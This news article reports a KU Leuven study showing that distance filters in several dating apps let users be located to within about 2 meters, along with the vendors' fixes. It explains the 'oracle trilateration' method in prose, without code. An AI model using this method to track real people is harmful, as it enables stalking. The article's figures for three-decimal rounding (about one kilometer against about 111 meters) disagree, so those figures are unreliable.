A recent study revealed that vulnerabilities in the design of several dating apps, including popular ones like Bumble and Hinge, enabled malicious users or stalkers to pinpoint the location of their victims to within 2 meters. Researchers from the Belgian university KU Leuven discovered these vulnerabilities while analyzing 15 popular dating apps. Among those, Badoo, Bumble, Grindr, happn, Hinge, and Hily were found to have the same issue, which could potentially allow a malicious user to identify another user’s near-exact location.
Although these apps do not share exact locations when displaying the distance between users on their profiles, they use precise locations for their “filters” feature. Filters enable users to tailor their search for a partner based on criteria like age, height, relationship type, and, importantly, distance.
The researchers used a technique they call “oracle trilateration” to pinpoint a target user’s exact location. Unlike general trilateration, which uses three points to measure their distance relative to the target, creating intersecting circles at the target’s location, oracle trilateration involves roughly estimating the victim’s location based on their profile and moving in increments until the victim is no longer within proximity. This process is repeated in three different directions, allowing the attacker to triangulate the victim’s position using the known exact distances.
“It was somewhat surprising that known issues were still present in these popular apps,” said Karel Dhondt, one of the researchers. Although this technique doesn’t reveal the exact GPS coordinates of the victim, “I’d say 2 meters is close enough to pinpoint the user,” Dhondt added.
Fortunately, all the apps with these vulnerabilities have now updated how their distance filters work. The researchers noted that the fix involved rounding up the exact coordinates by three decimals, making them less precise and accurate. This adjustment introduces an uncertainty of approximately one kilometer.
Bumble’s vice president of global communications, Gabrielle Ferree, stated that the company became aware of these findings in early 2023 and quickly resolved the issues, which also affected Badoo, owned by Bumble. Similarly, Dmytro Kononov, CTO and co-founder of Hily, reported that the company received the vulnerability report in May 2023 and took steps to eliminate the potential for trilateration attacks through new geocoding algorithms.
A Hinge spokesperson confirmed that the company “immediately took action” upon receiving the researchers’ report in early 2023. Happn CEO and president Karima Ben Abdelmalek added that, although their app has an additional layer of protection beyond rounding distances, they still engaged with the researchers to ensure the trilateration technique was ineffective.
The study also found that Grindr users could be located to within approximately 111 meters of their exact coordinates. While this is less precise than the 2 meters found in other apps, it still poses potential risks, especially in densely populated areas. Grindr rounds users’ precise locations by three decimals and, according to the company, this is a feature rather than a bug.
Kelly Peterson Miranda, chief privacy officer at Grindr, highlighted the importance of proximity for their users, many of whom rely on Grindr to connect with the LGBTQ+ community. Users can choose to disable their distance display if they prefer, maintaining control over their location information.
